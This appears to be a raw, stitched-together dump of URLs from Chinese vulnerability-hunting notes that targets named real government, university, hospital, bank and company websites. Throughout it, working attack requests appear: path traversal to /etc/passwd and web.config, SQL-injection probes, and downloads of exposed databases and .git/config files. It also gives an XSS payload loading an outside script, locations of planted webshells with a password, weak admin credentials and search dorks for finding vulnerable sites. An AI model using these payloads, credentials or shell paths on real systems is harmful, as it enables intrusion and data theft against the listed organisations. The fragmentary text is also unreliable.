http://www.coop.ln.gov.cn/info.asp?id=4413 http://www.yiliang.gov.cn/info.asp?id=723 http://www.yiliang.gov.cn/info.asp?id=723 http://www.yiliang.gov.cn/info.asp?id=723 http://bbs.chexun.com/3g/view.php?tid=655201 http://bbs.chexun.com/3g/view.php?tid=655202 http://bbs.chexun.com/3g/view.php?tid=655203 http://www.95590.cn/ebiz/view/userskin/findPwdSkin.jsp http://riem.swufe.edu.cn/riem/info.asp?id=67 http://zjc.zjwchc.com/jiuye/Info.asp?Id=17 http://www.sxtvu.cn/newss/info.asp?id=2633 http://www.transmed.org.cn/news-info.asp?id=36 http://www.tbts.edu.tw/eng/about.php?nid=5 http://me.07073.com/userinfo/gzhy/用户id,遍历id,关注所有账户,所有账户弹下窗也是挺好的,不知道二哥的水坑攻击是怎么做的。 http://ydbd.yandu.gov.cn/view_content.asp?article_bianhao=20110621041 http://smba.mbachina.com/Bjtu http://smba.mbachina.com/Bjtu http://smba.mbachina.com/Bjtu http://smba.mbachina.com/Buct http://smba.mbachina.com/Buct http://smba.mbachina.com/Buct http://smba.mbachina.com/Cass http://smba.mbachina.com/Cass http://smba.mbachina.com/Cass http://smba.mbachina.com/Cau http://smba.mbachina.com/Cau http://smba.mbachina.com/Cau http://smba.mbachina.com/Cupl http://smba.mbachina.com/Cupl http://smba.mbachina.com/Cupl http://smba.mbachina.com/User/Saveuser http://smba.mbachina.com/bit http://smba.mbachina.com/bit http://smba.mbachina.com/bit http://smba.mbachina.com/uibe http://smba.mbachina.com/uibe http://smba.mbachina.com/uibe http://crm.varsal.com.cn:8081/login/login.php http://crm.varsal.com.cn:8081/login/changepswd.php?orgcode=1&loginname=system cn:8081 http://60.12.94.190/ywzc/login.jsp http://58.22.154.146:1001/lookup/seldt.asp http://www.rcsjyw.cn http://www.rcsjyw.cn/UserList.asp获取一个用户登录了。才能上传。 inurl:info_Print.asp?ArticleID= http://www.cstqxx.com http://zq.17173.com/c9/simulator-v2/list.php?plan_type=&class1=HUNTER&class2=&order=case inurl:bulletinBrowse.jsp?Id= http://yx.cau.edu.cn/bulletinBrowse.jsp?Id=34d7de69-301b-11e4-b061-737b79faefa5 
http://yx.tjfsu.edu.cn/bulletinBrowse.jsp?Id=0cb2b864-0c9f-11e4-b0f7-3ff030a1e3c7 http://yingxin.ncepu.edu.cn/bulletinBrowse.jsp?Id=7083c9c4-14c3-11e3-b0cf-4f749c89c2ed https://my.cau.edu.cn/bulletinBrowse.jsp?Id=827b4143-31b3-11e4-b271-a1fcfaa213ec http://yx.hlju.edu.cn/bulletinBrowse.jsp?Id=597f7c7f-05a4-11e4-9486-f3f9755d003c%20%27 http://xinquban.henau.edu.cn/onews.asp?id=806 http://xiaoyou.henau.edu.cn/NewsDetail.asp?id=956 http://yancao.henau.edu.cn/about.asp?id=279 http://admin.mei.hitao.com http://msc.fdsm.fudan.edu.cn/?m=course&a=see&id=127 http://msc.fdsm.fudan.edu.cn/admin http://login.nanofab.fudan.edu.cn/exe/php/system/login.php http://www.ias.fudan.edu.cn/File.aspx?filepath=ArticleUpload/20122291021141555.doc http://www.cs.fudan.edu.cn/wp-content/uploads/ http://ee.fudan.edu.cn/electron/admin/ http://radio.fudan.edu.cn/fenglin/radio/ http://xwsys.fudan.edu.cn/cg/web/2013/ http://biotechlab.fudan.edu.cn/database/ http://www.stuaff.fudan.edu.cn/vote/files/2014/ http://www.ccgp-hainan.gov.cn/zxdt-m1.jsp?difang=hainan http://www.ccgp-hainan.gov.cn/gwdt-m.jsp?difang=hainan http://www.ccgp-hainan.gov.cn/allgg1.jsp?difang=hainan http://www.ccgp-hainan.gov.cn/cgzxdtdetail.jsp?tablename=cgnr&condition=182569&articleid=10000250556&difang=hainan http://www.ccgp-hainan.gov.cn/cgbxdetail.jsp?condition=10000439652&difang=hainan http://www.ccgp-shenzhen.gov.cn/allgg.jsp?difang=shenzhen http://www.ccgp-shenzhen.gov.cn/detail.jsp?condition=szhen0009&difang=shenzhen http://www.ccgp-shenzhen.gov.cn/allgg1.jsp?difang=shenzhen http://www.xinnet.com/domain/guohuapply.do?method=streamImage&id=2&type=1 http://www.baidu.com/s?wd=%E8%AF%B7%E5%AE%8C%E5%96%84%E6%82%A8%E7%9A%84%E8%B4%A6%E6%88%B7%E4%BF%A1%E6%81%AF%EF%BC%9A%E6%9F%A5%E6%94%B6%E7%8E%B0%E9%87%91 http://www.baidu.com/s?wd=%E6%82%A8%E5%8F%AF%E7%94%A8%E7%A7%AF%E5%88%86%E5%B7%B2%E5%85%91%E6%8D%A2%E7%8E%B0%E9%87%91%EF%BC%9A368.00%E5%85%83 
http://www.baidu.com/s?wd=%E6%82%A8%E5%8F%AF%E7%94%A8%E7%A7%AF%E5%88%86%E5%B7%B2%E5%85%91%E6%8D%A2%E7%8E%B0%E9%87%91%3A1065.00%E5%85%83 http://钓鱼网址/admin/login.html http://www.healwis.com/admin/ http://alumni.lnpu.edu.cn/servlet/jyjjjjjjServlet?method=jyjjdisplay&id=2 http://test.lashoupay.com/拉手的一个后台 http://59.151.89.9/index.php/Login http://59.151.89.65/ http://59.151.89.13/login http://59.151.89.65/help.html cn:8028 http://eoffice8.weaver.cn:8028 http://gdy.gdmc.edu.cn/rsc/rczp.asp?classid=30 http://www.fszxyy.com/Data/DvSQLLOG.mdb http://www.fszxyy.com/Data/IPaddress.mdb http://www.fszxyy.com/data/dvbbs8.mdb http://www.fszxyy.com/bbs/boke/Data/Dvboke.mdb http://www.fszxyy.com/bbs/data/dvbbs8.mdb http://202.110.202.171:8080/common/shell/ http://www.mbachina.com/down.php?path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://219.146.3.91:9001/servlet/download.action?fileName=../jsp/welcome.jsp http://219.146.3.91:9001/servlet/download.action?fileName=../../struts.xml http://219.146.3.91:9001/servlet/download.action?fileName=../error.jsp http://219.146.3.91:9001/servlet/download.action?fileName=../index.jsp http://hz.zj.weather.com.cn/testhzqx/zfxxgk/web/QXYS/newsList.aspx?CategoryId=56 http://hz.zj.weather.com.cn/testhzqx/zfxxgk/web/ZWGK/getnewslist.aspx?CategoryId= http://hz.zj.weather.com.cn/testhzqx/zfxxgk/web/QXYS/newsList_media.aspx?CategoryId=53 http://design.weather.com.cn/view_design.php?id=369 http://photo.weather.com.cn/photoUp/view_summer_2014.php?id=129546 http://www.diancms.com/user/message/ReadMessage.aspx?Id=55 http://www.kj-hospital.com/ny.asp http://www.fszxyy.com/expertcontent.asp?id=72 http://60.161.215.7:8888/main.aspx http://ysjk.jiankang.cn/ http://ysjk.jiankang.cn/?act=mec&id=60 http://www.jynsh.com/ http://www.jynsh.com/show.php?id=22495&cid=238 http://183.136.160.228 http://jh.zmzb.com/WebForms/Frame/Login.aspx http://jh.zmzb.com/webforms/bt/btreportingplanview.aspx http://photo.weather.com.cn/photoUp/2013sy_spring.php 
http://photo.weather.com.cn/photoUp/upload/spring2013/cwp/news/201409161147081.jpg/0.php http://8.weicaifu.com http://forum.weibopay.com http://8.weicaifu.com/uc_server/admin.php?sid=d725DAXiX7bPw9P6zxBwD9XNnMK4o8W7jEQ0PCs3piarxGZkkB%2F5KKZd7WEmKV5tztbURxWmNZr45w http://8.weicaifu.com/ http://183.136.160.207:8088/cluster/nodes http://183.136.160.207:8088/logs/ http://loudong.rising.com.cn/SearchBug.aspx?s=xss http://loudong.rising.com.cn/SearchBug.aspx?s=%26lt;script%20src=//20.rs%26gt;%26lt;/script%26gt http://gd.10086.cn/shadu/kvweb/index.jsp http://gd.10086.cn/shadu/servlet/QuestionNoteServlet http://gd.10086.cn/shadu/servlet/QuestionNoteServlet http://www.xinnet.com/user/user.do?method=toFindPwd http://www.xinnet.com/user/user.do?method=findPwdNew&findPwdStep=step1 http://www.xinnet.com/user/user.do?method=findPwdNew&findPwdStep=step2 https://fm.163.com/bbs/viewthread.php?tid=689187&pid=729698&page=3 http://wooyun.org/bugs/wooyun-2014-076171 http://www.rcwl.net/b/tea/bag_batch_input.jsp?hasChildType=1&typeId=1 http://www.rcwl.net/b/tea/bag_batch_input.jsp?hasChildType=1&typeId=1 http://wap.foundationcenter.org.cn/FoundView.asp?FoundStr=1&Find=yes&page=1&Id=1424 http://wap.foundationcenter.org.cn/FoundFindList.asp http://www.95590.cn/lpwd/hbdg/tj/index.shtml#anchor http://www.95590.cn/ebiz/view/onlineser/sendSMSMessage.jsp?network=%E9%9D%99%E6%B5%B7%E6%94%AF%E5%85%AC%E5%8F%B8&address=%E5%A4%A9%E6%B4%A5%E5%B8%82%E9%9D%99%E6%B5%B7%E5%8E%BF%E4%B8%9C%E6%96%B9%E7%BA%A2%E8%B7%AF%E9%87%91%E6%B5%B7%E5%9B%AD1%E5%8F%B7%E6%A5%BC%E5%BA%95%E5%95%86S17%E5%8F%B7&telephone=022-59580201 http://www.95590.cn/ebiz/view/onlineser/sendSMSMessage.jsp?_action=sendOnlineSerMessage&address=%E4%BD%A0%E5%AE%B6&expiredTimeWithSecond=60&mobile=XXXX&network=%E4%B9%8C%E4%BA%91&sysTime=0&telephone=110 http://".$_SERVER['HTTP_HOST http://www.chaohu.gov.cn/newrevision/gov_option_result_list.aspx?option_id=13 http://www.chaohu.gov.cn/manage/login.aspx 
http://219.247.199.37/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://180.168.106.102:8300/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://zdpd.stiei.edu.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://oa.qyzx.mhedu.sh.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://xfz.shetms.com/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://oa.gzmj.net.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.so.com/s?q=技术支持:南京杰诺瀚软件科技有限公司&pn=6&j=0&ls=0&src=srp_paging&fr=se6_drag&psid=fd6d2e7d82880c6dc196c2c8a1252a12 http://www.gjmzyfs.com/Web/Login.aspx http://www.lcsjwk.com/Web/Login.aspx http://www.jsnyxb.com/Web/Login.aspx http://ctc.hlglzz.com/Web/Login.aspx http://xb.cuit.edu.cn/Web/Login.aspx www.cnemergency.com http://www.cnemergency.com http://www.sd.10086.cn/eMobile/firstLogin.action?menuid= http://www.hhly.gov.cn/home/page.php?id=1,参数id存在注入 admin:iceflow,后台管理如图 http://61.4.185.26/ http://61.4.185.26:8080/userCommonAction!login.action http://wooyun.org/bugs/wooyun-2014-067982 http://wooyun.org/bugs/wooyun-2010-067982 inurl:viewList.aspx?typeid= http://free-100.net/searchLines.aspx?LStartDate= http://free-100.net/triplist.aspx?typeID=1 http://free-100.net/tripCity.aspx?cityid=12 http://free-100.net/searchLines.aspx?LStartDate=&page=1 http://free-100.net/viewList.aspx?typeid=2 http://free-100.net/searchLines.aspx?toAdd=%e6%8b%89%e8%90%a8&page=1 http://free-100.net/viewList.aspx?typeid=2 http://www.sqlmap.org http://jj.cust.edu.cn/news-every.asp?id=366 http://businessinfo.co.uk/labs/xss/xss.swf http://www.xmbtn.com/webepg/riqi.jsp?serviceid=4103 inurl:/opac/book/do.jsp?method http://118.122.113.7:8080/opac/rss/do.jsp?marcType=1&callNumber=&intDay=1&rang=50 http://211.167.243.154:7001/iss/ http://211.167.243.154:7001/iss/uploadfile/images/710956e634124f4395754935a6279db0.jsp http://vps.myxinnet.com/html/index.html 
http://bond.money.hexun.com/iframe/bond2-1.aspx?bondtype=1&col=8&orderby=asc&selDate=2011-12-30 http://mall.cqcbank.com http://zscx.buu.edu.cn/login.aspx?id=18 http://119.10.114.149 http://61.155.153.248:28099 http://114.112.53.45:28099 http://ee.xjtu.edu.cn/new_ee/ee_admin/log/register.php http://www.hengnan.gov.cn/sssweb/DirectoryPublic/main.aspx?DeptID=DA0207 http://www.hengdong.gov.cn/sssweb/DirectoryPublic/Main.aspx?deptid=DDD080’ https://ip/excel/user_export.php https://ip/excel/server_export.php https://ip/excel/sso_user_export.php?rsname= http://www.njrc168.com/Main/NewsDetail.aspx?ID=113 www.cicro.com使用了WebCarrier http://kas.knet.cn/ http://10.12.6.34/xinnet/xinnetOL http://10.12.6.34/xinnet/xinnetOLFRONT http://10.12.6.34/xinnet/xinnetOLBACK http://10.12.6.34/xinnet/xinnetmis http://10.12.6.34/xinnet/cbi_dns http://10.12.6.34/xinnet/XinnetSystem http://10.12.6.34/xinnet/commonSupport http://10.12.6.34/xinnet/vpsManage http://agent.xinnet.com/ipCheck/y785718/w4u8tuejioa23/x136835.do?method=ipCheckLogin http://hymanage.xinnet.com/ http://manage.xinnet.com/ http://www.ctnma.cn http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id= www.XXXX.com http://www.nnfls.cn:8080/ http://www.nnfls.cn:8080/yznetdata/ http://www.nnfls.cn:8080/yznetdata/wooyun.txt http://tgou.voc.com.cn/admin/index.php http://xxx/fileUploadDownloadAction.do?actionType=1 http://www.pusicapital.com/touzi.aspx?m=20120809134728990913 http://www.pusicapital.com/ProjectList.aspx?m=20120809135804757952 http://www.pusicapital.com/newlist.aspx?m=20120809135923100964 http://www.pusicapital.com/contactus.aspx?m=20120809135247257925 http://www.pusicapital.com/NewInfo.aspx?n=20140815151723937640&m=20120809135923100964 http://www.pusicapital.com/ProjectInfo.aspx?n=20140808155313280617&m=20120809135804757952 http://www.pusicapital.com/TeamInfo.aspx?n=20120830140306120130&m=20120809135500240940 http://www.pusicapital.com/Team.aspx?m=20120809135500240940 
http://www.pusicapital.com/eng/touzi.aspx?m=20120912085859013156 http://www.pusicapital.com/eng/AboutUs.aspx?m=20120912090725857171 http://www.pusicapital.com/eng/Newlist.aspx?m=20120912093431700189 http://www.pusicapital.com/eng/contactus.aspx?m=20120912090325967168 http://www.pusicapital.com/eng/ProjectInfo.aspx?n=20140808160014687622&m=20120912093250920186 http://www.pusicapital.com/eng/TeamInfo.aspx?n=20121012131936013245&m=20120912092623390180 http://www.pusicapital.com/eng/Team.aspx?m=20120912092623390180 http://www.pusicapital.com/eng/NewInfo.aspx?n=20120912104910530209&m=20120912093431700189 http://www.pusicapital.com/eng/ProjectList.aspx?m=20120912093250920186 http://www.pusicapital.com/tzcl.aspx?m=20120809134809380916 http://www.pusicapital.com/eng/tzcl.aspx?m=20120912085926170159 http://www.pusicapital.com/ProjectInfo.aspx?n=20140808155313280617&m=20120809135804757952 http://www.pusicapital.com/TeamInfo.aspx?n=20120830140306120130&m=20120809135500240940 http://www.pusicapital.com/NewInfo.aspx?n=20140815151723937640&m=20120809135923100964 http://www.pusicapital.com/eng/ProjectInfo.aspx?n=20140808160014687622&m=20120912093250920186 http://www.pusicapital.com/eng/TeamInfo.aspx?n=20121012131936013245&m=20120912092623390180 http://www.pusicapital.com/eng/NewInfo.aspx?n=20120912104910530209&m=20120912093431700189 http://support.umeng.com/.git/config http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?editId=2&action=listLoad http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=modify http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=delete http://60.221.230.87/20144517014514.asp;.txt http://124.115.221.71/ http://124.115.221.71/20144517014514.asp;.txt http://kh.shikee.com/index.php http://www.ssfdc.gov.cn/static.php?id=1 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/NoticeShow.aspx?id=1086 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/RecruitmentShow.aspx?id38=50833 
http://jiuye.swjtu.edu.cn/jdjy/NewsShow/JobGuidenceShow.aspx?id=565 http://shop.taihainet.com/group/message.php?act=1 http://shop.taihainet.com/group/link.php?act=go&city=fujian&url=1 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018 http://www.nmgslw.gov.cn/info/infoView.jsp?idcontent=4762 http://beian.cndns.com/ http://beian.cndns.com/icpadmin.php?module=admin_icp_hshow&id=123 http://219.143.235.50:80/ http://219.143.235.50/20144517014514.asp;.txt www.jt168.com http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.2.x/docs/s2-005.html http://www.nenu.edu.cn/professor/pro/yul/c_print.php?id=154 http://www.target.com//weaver/weaver.email.FileDownloadLocation?fileid=附件ID&download=1 http://gl.triolion.com/ http://zmoa.warom.com:801/ http://www.yzjoa.com/ http://oa.nws.gov.cn/ http://www.cweme.net/ http://cyoa.warom.com:803/ http://220.248.243.186:8081/ http://sys.cdc.zj.cn/ http://cygf.warom.com:805/ http://oa.cncie.com/ http://oa.uuzz.com/ http://oa.hnnc.net:82/ http://oa.yangtzeu.edu.cn/ http://oaf.yitoa.com:6688/ http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://zmoa.warom.com:801/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://www.yzjoa.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://www.cweme.net/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://cyoa.warom.com:803/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://sys.cdc.zj.cn/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://cygf.warom.com:805/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oa.cncie.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 
http://oa.uuzz.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oaf.yitoa.com:6688/weaver/weaver.email.FileDownloadLocation?fileid=1201*&download=1 http://oa.nws.gov.cn/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1 http://oa.hnnc.net:82/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1 http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://gl.triolion.com/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1 http://music.google.cn/search?newwindow=1&q=infoms%2Fidentity%2Findex.c&btnG=Google+%E6%90%9C%E7%B4%A2 http://220.178.0.180/infoms/identity/index.c http://218.76.27.109/infoms/identity/index.c http://aid.ec.js.edu.cn/infoms/identity/index.c http://202.119.175.107/infoms/identity/index.c http://58.213.129.204/infoms/ http://58.213.129.204/infoms/visitor/getKpzh-list.c?glyxm=1&wdl=&xxmc=1 http://www.yiban.cn/msg/sys?kind=114,kind存在注入 http://t5.edusoho.cn/group/2/thread/7?page=1#post-85 http://review.train.gov.cn/ http://review.train.gov.cn/Index/Index/viewNews/id/33 http://oa.fun.tv/ www.***.com/admin%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://www.xxx.com/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.xxx.com/admin/FCKeditor/editor/filemanager/connectors/test.html http://www.myhack58.com/Article/html/3/62/2012/33638.htm http://www.jiangxi.gov.cn/dtxx/tjdt/201202/t20120215_693074.htm http://59.53.172.250:8080/ http://59.53.172.250:8080/20144517014514.asp;.txt http://www.jjtonline.com/login.action执行地址 http://csyb100.mycomb.com/web/csyb100/files/test22.asp密码:1 http://csyb100.mycomb.com/web/csyb100/files/asp%281%29.asp http://www.rcwl.net/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.rcwl.net/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.rcwl.net/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 
http://oa.xndxfz.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.wxzzyey.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://ww1980.cqjjzx.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://www.czlcxx.com/webschool/Book/book_read_online_list.jsp?schoolid=1&groupId=111 http://218.7.20.50:80/ http://jy.gdgs.gov.cn/shownews.asp?id=526 http://jy.gdgs.gov.cn/upfile_photo.asp http://hzzcpd.train.gov.cn/ http://hzzcpd.train.gov.cn/Home/Index/viewNews/id/2447 http://kh.shikee.com/ http://www.comingchina.com/ http://www.comingchina.com/html/downloads/ http://www.comingchina.com/download/soft/U-Mail9.8.56.zip site:dapu.com http://www.dapu.com/product-askdetail-664*-18912*.html http://sqlmap.org http://m.dapu.com/mgallery-items--1.html?scontent=%E9%95%BF http://m.dapu.com/mgallery-items--1.html?scontent=%E9%95%BF http://sqlmap.org http://tpupdate.chanjet.com/TPlus/login.htm ip:58.44.223.247 http://mail.scichina.org/的一个弱口令帐户:info/info2014 http://www.qyszxxz.com/list.jsp?classid=36&preid=17 http://202.100.85.100/list.jsp?preid=240&classid=247 http://www.ldlyy.com/sub_detail.jsp?classid=29&preid=1 http://www.gsjkjy.org.cn/mail_detail.jsp?id=6 http://202.100.85.100/list.jsp?preid=240&classid=247为例证明如下 http://www.gsblood.com/甘肃省血液中心 http://www.qyszxxz.com/庆阳市中心血站 http://www.jcsxz.com/金昌市中心血站 http://www.jygsyy.com/嘉峪关市第一人民医院 http://www.lzfybj.cn/兰州市妇幼保健院 http://www.qyszyy.com/庆阳市中医医院 http://www.lxzfby.com/临夏州妇幼保健院 http://www.gsfybjy.com/甘肃省妇幼保健院 http://www.qyfybj.com/庆阳市妇幼保健院 www.xxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.lzfybj.cn/为例证明: http://www.lzfybj.cn//FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.lzfybj.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=File/ 
http://qy.gsws.gov.cn/admin/webedit/admin_login.asp http://ww.gsws.gov.cn/admin/webedit/admin_login.asp http://ts.gsws.gov.cn/admin/webedit/admin_login.asp http://ln.gsws.gov.cn/admin/webedit/admin_login.asp http://lx.gsws.gov.cn/admin/webedit/admin_login.asp http://pljk.gsws.gov.cn/admin/webedit/admin_login.asp http://jqjk.gsws.gov.cn/admin/webedit/admin_login.asp http://lxjk.gsws.gov.cn/admin/webedit/admin_login.asp http://dsa.dayainfo.com/ http://www.jiechengit.com/index.html http://www.jiechengit.com/case.html http://club.show.sina.com.cn http://club.show.sina.com.cn/viewthread.php?tid=624385&page=1 http://www.conet.org.cn/skill/index.html http://www.conet.org.cn/module/skilliden/perScoreQueryInfo.do?aptScoreId=xxxx http://www.elut.cn/works.html http://www.sunrisingbelt.com/product_show.asp?keyno=1242 http://www.sunrisingbelt.com/news_detail.asp?keyno=532 http://www.hnttex.com/news_detail.asp?keyno=620 http://www.hnttex.com/product_show.asp?keyno=1278 http://www.dgzhuoshun.com/product_show.asp?keyno=1186 http://www.dgzhuoshun.com/news_detail.asp?keyno=616 http://www.lonova-ele.com/product_show.asp?keyno=1296 http://www.lonova-ele.com/news_detail.asp?keyno=532 http://www.wisevigor.com/product_show.asp?keyno=1270 http://www.wisevigor.com/news_detail.asp?keyno=511 http://www.easymechem.com/news_detail.asp?keyno=532 http://www.easymechem.com/product_show.asp?keyno=1204 http://www.printingbetter.com/product_show.asp?keyno=1219 http://www.printingbetter.com/news_detail.asp?keyno=560 http://www.todobelt.com/product_show.asp?keyno=1217 http://www.todobelt.com/news_detail.asp?keyno=629 www.jiafutong.net http://demo.xdcms.cn/ http://www.woqu.com/hotel/search/lc-USLAX;sd-20140925;ed-20140926;prf-0;prt-100000;str-0;st-mt;p-5?hotelCode=1&key=1 http://www.sxaj.gov.cn/utility/script.aspx?key=tag&t=TWV0YS5XZWIuQWR2ZXJ0cy5Kc0FELE1ldGEuV2ViLkFkdmVydHM=&p=tq http://huihua.hebtu.edu.cn/hhoffice),可发布,查询等等。没敢上传,目测可以SHELL,(不行你也别打我)。工会 http://nczx.yonyou.com/tanchu.htm 
ftp://125.35.5.209/ ftp://125.35.5.232/ http://sports.shangdu.com/heibai/?c=web&a=lists&aid=105 http://118.180.8.111/login.jsp http://183.224.77.7/loginAction.action http://www.cdpx.net/oa/WebOA/UploadFile/Student/ https://222.190.175.209/ http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDepartList.aspx?departcode=%27 http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDep http://10.143.34.170的80端口给了我200的返回,于是打开ip看看。 prtgadmin:prtgadmin http://www.ahtxjs.com/UploadFiles/ http://nclub.dongfeng-nissan.com.cn/MemberNew/FindPassWord.aspx http://owners.dongfeng-nissan.com.cn/MemberNew/ActivityDetail.aspx?code=ACTOPV130131R5133*&type=4 www.dnsvhost.com http://web440457.dnsvhost.com/,尝试后台地址和管理员密码组合,后台在http://web440457.dnsvhost.com/admin/,密码为admin/admin。 http://www.wxlibiao.com/home/?uid=10549 inurl:/dpma/FWeb/ http://www.hbgsny.com/Admin/login.aspx inurl:channel.php?root_lanmu= http://www.sxglwz.com/channel.php?root_lanmu=9 http://www.sxglwz.com/news.php?root_lanmu=21 http://www.sxglwz.cc/news.php?root_lanmu=18 http://www.sxglwz.com/channel.php?root_lanmu=9 http://www.sxglwz.com/news.php?id=87&root_lanmu=18&sub_lanmu=139 http://www.xiec.com/news.php?root_lanmu=3 http://www.xiec.com/channel.php?root_lanmu=1&sub_lanmu=20 http://www.longwill.biz/cn/news.php?root_lanmu=9 http://www.longwill.biz/cn/channel.php?root_lanmu=13 http://www.luluchang.com/Web/channel.php?root_lanmu=17&sub_lanmu=54 http://www.zdgj.cc/channel.php?id=52&root_lanmu=58&sub_lanmu=139 http://sxglwz.biz/channel.php?root_lanmu=20 http://www.sx12122.net/channel.php?id=555&root_lanmu=45&sub_lanmu=117 http://www.sxglwz.net.cn/channel.php?id=31&root_lanmu=20&sub_lanmu=149 http://www.z029.com/ inurl:php/WZ_read.php?articid= http://www.htgrape.com/php/WZ_read.php?articid=107 http://www.xdblq.com/php/WZ_read.php?articid=96 http://www.forstar.com.cn/php/news_table.php?id=1242 http://www.zryhsx.com/php/WZ_read.php?articid=341 http://www.xayzw.com/php/news_read.php?articid=643 
http://www.xasaihu.com/php/WZ_read.php?articid=262 http://www.xaqsw.com/php/wz_read.php?articid=324 http://www.laosundajia.com/php/wz_read.php?articid=1485 http://www.guangrensi.com/php/WZ_read.php?articid=54 http://www.htgrape.com/php/WZ_read.php?articid=109 http://www.xasaihu.com/php/WZ_read.php?articid=230 http://www.anchensw.com/php/wz_read.php?articid=17 http://www.silian.com.cn/php/wz_read.php?id=33 http://www.sundagentleman.com/FT/php/wz_read.php?id=121 http://www.htgrape.com/php/WZ_read.php?articid=107'%20and%20'1'='1 http://www.htgrape.com/php/WZ_read.php?articid=107'%20and%20'1'='2 http://www.xdblq.com/php/WZ_read.php?articid=92'%20and%20'1'='1 http://www.xdblq.com/php/WZ_read.php?articid=92'%20and%20'1'='2 http://www.forstar.com.cn/php/news_table.php?id=1242'%20and%20'1'='1 http://www.forstar.com.cn/php/news_table.php?id=1242'%20and%20'1'='2 http://www.zryhsx.com/php/WZ_read.php?articid=341'%20and%20'1'='1 http://www.zryhsx.com/php/WZ_read.php?articid=341'%20and%20'1'='2 http://www.xaqsw.com/php/wz_read.php?articid=324'%20and%20'1'='1 http://www.xaqsw.com/php/wz_read.php?articid=324'%20and%20'1'='2 http://www.xayzw.com/php/news_read.php?articid=643'%20and%20'1'='1 http://www.xayzw.com/php/news_read.php?articid=643'%20and%20'1'='2 http://www.xasaihu.com/php/WZ_read.php?articid=262'%20and%20'1'='1 http://www.xasaihu.com/php/WZ_read.php?articid=262'%20and%20'1'='2 http://www.laosundajia.com/php/wz_read.php?articid=1485'%20and%20'1'='1 http://www.laosundajia.com/php/wz_read.php?articid=1485'%20and%20'1'='2 http://www.sundagentleman.com/FT/php/wz_read.php?id=121'%20and%20'1'='1 http://www.sundagentleman.com/FT/php/wz_read.php?id=121'%20and%20'1'='2 http://www.silian.com.cn/php/wz_read.php?id=33'%20and%20'1'='1 http://www.silian.com.cn/php/wz_read.php?id=33'%20and%20'1'='2 http://www.anchensw.com/php/wz_read.php?articid=17'%20and%20'1'='1 http://www.anchensw.com/php/wz_read.php?articid=17'%20and%20'1'='2 
http://www.xasaihu.com/php/WZ_read.php?articid=230'%20and%20'1'='1 http://www.xasaihu.com/php/WZ_read.php?articid=230'%20and%20'1'='2 http://www.guangrensi.com/php/WZ_read.php?articid=54'%20and%20'1'='1 http://www.guangrensi.com/php/WZ_read.php?articid=54'%20and%20'1'='2 http://www.gxbttc.com/Login.aspx http://xhzhglxt.cirea.org.cn/website/zcxt_1_cx_gs.asp?DwID=23423 www.wanxinsoft.com http://www.wanxinsoft.com/product1_1.asp http://sys.zafu.edu.cn:81/ http://210.27.176.162/ http://sys.zafu.edu.cn/dy/ http://202.114.168.176/ http://59.69.101.10/ http://202.114.168.176/model/TwoGradePage/newsdetail.aspx?id=133&columnId=99 http://202.114.168.176/model/TwoGradePage/NewsEquipment.aspx?OpenID=82&id=11316 http://202.114.168.176/model/TwoGradePage/newsdetail.aspx?id=133&columnId=99 www.wanxinsoft.com http://www.wanxinsoft.com/product1_1.asp http://sys.zafu.edu.cn:81/ http://210.27.176.162/ http://sys.zafu.edu.cn/dy/ http://202.114.168.176/ http://59.69.101.10/ http://202.114.168.176/model/TwoGradePage/jifen.aspx?columnId=75 http://202.114.168.176/model/TwoGradePage/CIntroduce.aspx?columnId=96 http://202.114.168.176/model/TwoGradePage/CIntroduce.aspx?columnId=96 http://jg.chinasarft.gov.cn/eap/GDZJReport.do?channel=1&cmd=list&listformid=gd_content_nr_list 